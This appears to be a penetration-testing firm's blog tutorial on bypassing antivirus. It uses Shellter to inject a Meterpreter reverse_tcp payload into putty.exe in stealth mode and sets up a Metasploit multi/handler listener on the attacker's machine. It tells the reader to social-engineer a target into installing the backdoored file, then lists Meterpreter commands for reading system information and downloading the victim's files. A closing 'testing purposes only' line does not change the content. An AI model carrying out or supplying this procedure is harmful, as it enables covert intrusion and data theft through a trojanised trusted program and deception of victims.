There are many anti-virus programs available on the market. Some are even free, like: Avira Anti Virus, AVG Free Antivirus or 360 Internet Security and many more. A virus scanner is meant to find and remove malicious content from your system, or prevent it from getting there in the first place. Malicious content can either harm a computer or act as a backdoor for a hacker to exploit your system.
But what if someone is still able to get access your system and exploit it even when you have one of these reputable anti-virus programs installed on your system? Are we really safe with a virus scanner?
Using Kali and Shellter to penetrate a Windows system
With the popular Kali Linux Framework called Metasploit even a good virus scanner can be bypassed. Using Shellter, an interface under the Metasploit framework, you can inject shell-code into native Windows applications (currently 32-bit applications only). Kali can be run from a virtual machine image, in live mode by running the ISO or by installing on your system.
Metasploit is not a single tool, it is a framework which is used for developing and executing exploit code against a remote target.
- Payload is a piece of code that runs remotely on the target system.
- Exploit is a chunk of data or a sequence of code that takes advantage of a bug or vulnerability.
- Auxiliary modules are used for scanning, fuzzing and doing various tasks.
- Encoder is a program which encodes payloads to avoid anti virus detection.
Metasploit has several different interfaces to ease our tasks. We can do a variety of tasks with these interfaces:
- MSFConsole: This is the main interface and can be opened through the terminal by executing: “msfconsole”
- Armitage: A graphical version for metasploit. In Armitage we can open more than one terminal and search for either GUI or CUI exploits at the same time.
- Shellter: Is a dynamic shell-code injection tool, and the first truly dynamic PE infector ever created. Shellter takes advantage of the original structure of the PE file and doesn’t apply any modifications such as changing memory access permissions in sections (unless wanted by the user), adding an extra section with RWE access, and whatever would look dodgy under an Anti-virus scan.
Lets start hacking with Metasploit - Shellter
First we need to download and install Shellter and a PE target. A PE target is a 32-bit executable (exe) file that we will send to the target machine. Log in to your Kali system and do the following:
- Download shellter.zip from www.shellterproject.com/download/
- Extract it to desktop.
- Download putty.exe file from www.putty.org
- Place this putty.exe file in the extracted shellter folder.
- Now to run shellter on Kali, open terminal on Kali and go the Shellter folder and execute: wine shellter.exe
- It will open Shellter in wine and ask you for the PE target
- Now that you have put your putty.exe file in the shellter directory, write putty.exe and press Enter.
- Type a to select automatic mode.
- Confirm yes to stealth mode.
- Type l to choose from listed payloads. But you can also create your own payload.
- After that you will be presented with a list of payloads. We will press 1 to choose windows/meterpreter/reverse_tcp
- Set LHOST, the IP address of your Kali machine. In order to check it, open a new terminal and write ifconfig and press Enter.
- SET LPORT, the port on which Metasploit will listen for the target machine's requests.
The newly created putty.exe is the backdoor that needs to run on the target machine.
Now open a new terminal and start msfconsole, the Metasploit Interface will open.
- Execute use exploit/multi/handler. This is the name of the exploit that we will use. Metasploit has different types of exploits available for different kinds of attacks.
- Execute set payload windows/meterpreter/reverse_tcp This command will set a payload that basically is code that will run into the target machine.
- Set LHOST, the IP address of your Kali Machine.
- Set LPORT, the listening port for Shellter.
Now you will be able to listen to your target's requests.
In order to gain access to the target machine use your social engineering skills in order to make the target installs putty.exe on the system. The reason why I choose putty.exe is because putty.exe is a program that makes Windows users establish a secure connection to Unix (and Linux) terminals, among other things. So the target will not have any doubt for it being a malicious file.
When putty.exe is running on the target system, run from terminal: exploit . If everything went according to plan, a Meterpreter session will open.
What can you do with Meterpreter?
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers. In simple words, with meterpreter you can have command line access to the target's system.
Here are some commands for meterpreter,
- sysinfo will give you the target system's information.
- download downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. For example: download c:\\boot.ini
For a whole lists of command, type help.
Have fun hacking, but please use your skills for testing purposes only!
Want us to test your security?
Want to know if your systems are safe? Check out our penetration testing service!